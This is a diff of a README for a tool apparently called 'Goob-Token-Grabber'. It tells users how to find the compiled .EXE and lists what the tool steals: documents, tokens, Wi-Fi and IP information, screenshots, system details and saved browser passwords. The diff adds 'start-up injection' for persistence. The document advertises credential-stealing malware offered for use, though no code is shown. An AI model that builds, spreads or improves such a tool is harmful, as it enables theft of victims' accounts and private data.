Horizon89002/Goob-Token-Grabber/README.md

 after its done compiling you can now go to the dist folder, and there should be an .EXE file placed in the folder

 # Futures 📊
-documents📁 , tokens 🍪 , WI-FI information 🌐 , IP-information 🏠, screenshot 💻, system information 🛠️ , saved browser passwords 🎫.
+documents📁 , tokens 🍪 , WI-FI information 🌐 , IP-information 🏠, screenshot 💻, system information 🛠️ , saved browser passwords 🎫 , start-up injection 🧨.